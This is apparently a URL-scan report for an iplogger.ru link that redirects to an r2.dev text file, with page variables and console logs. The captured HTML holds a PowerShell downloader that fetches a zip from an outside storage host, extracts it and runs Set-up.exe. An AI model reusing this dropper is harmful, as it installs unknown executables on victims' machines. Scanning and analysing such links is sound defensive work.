https://pub-9c4ec7f3f95c448b85e464d2b533aac1.r2.dev/Lejr90.txt

提交的 URL:
https://iplogger.ru/250925已重定向
报告完成时间:

链接 · 找到 0 个

JavaScript 变量 · 找到 3 个

名称类型
onbeforetoggleobject
documentPictureInPictureobject
onscrollendobject

控制台日志消息 · 找到 1 条

类型类别记录
errornetwork
URL
https://pub-9c4ec7f3f95c448b85e464d2b533aac1.r2.dev/favicon.ico
文本
Failed to load resource: the server responded with a status of 404 (Not Found)

HTML

<html><head><meta name="color-scheme" content="light dark"></head><body><pre style="word-wrap: break-word; white-space: pre-wrap;">$webClient = New-Object System.Net.WebClient
$url1 = "https://eu2.contabostorage.com/97c9beb737884d93a1899766d9f4e34c:gostired/jopi23.zip"
$zipPath1 = "$env:TEMP\pg1.zip"
$webClient.DownloadFile($url1, $zipPath1)
$extractPath1 = "$env:TEMP\file"
Expand-Archive -Path $zipPath1 -DestinationPath $extractPath1
Start-Process -FilePath $env:TEMP\file\Set-up.exe
</pre></body></html>